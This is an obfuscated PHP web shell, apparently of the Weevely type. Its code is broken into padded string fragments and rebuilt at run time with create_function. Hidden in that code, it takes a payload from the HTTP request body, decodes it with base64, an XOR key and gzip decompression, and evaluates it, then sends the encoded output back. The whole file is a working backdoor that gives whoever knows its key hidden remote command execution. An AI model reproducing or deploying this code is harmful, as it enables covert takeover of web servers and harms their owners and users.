<?php
$G='();$r=@base-6-4_--encode(@x(@gzcom-pres-s($o-),$k));prin-t("$p-$kh$r$kf");}';
$t='_match-("/$kh(-.+-)$kf/-",@fi-le--_-get_conte-nts("php://input"),$m)=';
$l='-=1) -{@ob-_start(-);@ev-al(@g-zuncompr-ess(@-x(@ba-se64_decod';
$B=str_replace('aA','','creaAaAataAe_fuaAnaAaAction');
$N=';$j++,$-i++)-{$o.=$t{$-i}^-$k{$j-};}}retu-rn $o;}if -(@p-reg';
$h='-e($m[1])-,$k)-))-;$o=@ob_g-et_con-tents();-@-ob_end_c-lean-';
$e='rl-en($t);-$o="";fo-r(-$i=0-;$i<$l;){for(-$j=0-;($-j<$c-&&$i<$l)-';
$n='$k="52363-63b";-$kh="d4-d-fee5fc5-dc";$kf=-"3-f32d35-c6b5d";$p=';
$X='"Y-M-J-DzMZyqM23-2rD-K";function x($-t-,$k){-$c=strlen(--$k);$l=st';
$P=str_replace('-','',$n.$X.$e.$N.$t.$l.$h.$G);
$g=$B('',$P);$g();
?>
